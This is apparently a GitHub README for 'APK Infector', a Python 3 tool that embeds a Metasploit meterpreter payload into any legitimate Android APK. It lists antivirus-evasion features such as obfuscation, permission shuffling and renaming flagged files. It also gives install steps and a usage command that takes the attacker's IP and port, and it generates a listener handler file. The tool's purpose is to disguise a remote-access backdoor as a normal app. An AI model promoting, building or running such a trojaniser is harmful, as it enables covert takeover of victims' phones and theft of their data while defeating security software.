
Advanced Android AV Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK

Primary LanguagePython

APK Infector Logo

APK Infector

                    This small python script can do really awesome work.

Advanced Android Antivirus Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK & can completely ofusticate the meterpreter payload with different techniques.


  • Fully Automate Payload Creation Using MSFvenom
  • Creates a handler.rc File
  • Undetectable
  • Ofusticate Meterpreter APK
  • Binds/Embeds Meterpreter APK with Any Legitimate APK
  • Automatically Generates a Key which is used in signing
  • Capable to Sign APK Using Jarsigner or APKsigner
  • Zipalign the Signed APK
  • Shuffles the Permissions of Meterpreter APK for AV Evasion
  • Changes the default foldername and filenames which are being flagged by AV

Tools Overview

Front View Sample Feature
Index f


  • Python 3.X
  • APKsigner or Jarsigner [One of them]
  • APK Tool [Latest]
  • ZipAlign

Tested On

Kali) Kali Linux - 2019.4

Installation & Usage

# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/PushpenderIndia/apkinfector.git

# Navigate to technowlogger folder
$ cd apkinfector

# Installing dependencies
$ apt-get update && apt-get install apktool && apt-get install zipalign && apt-get install apksigner

# Running the Tool for 1st Time
$ python3 infector.py --help

# Usage Example
$ python3 infector.py --lhost --lport 4444 --apk-name NEW_APK_NAME --normal-apk /root/Desktop/Path/TO/Legitemate_APK_File.apk

Available Arguments

  • Optional Arguments
Short Hand Full Hand Description
-h --help show this help message and exit
  • Required Arguments
Short Hand Full Hand Description
--lhost Attacker's IP Address
--lport 4444 Attacker's Port
-n NORMAL_APK --normal-apk NORMAL_APK Absolute Path of Legitimate APK File
--apk-name APKNAME APK Name (Anything You Want To Name)


  • All Contributors are welcome, this repo needs contributors who will improve this tool to make it best.



More Features Coming Soon...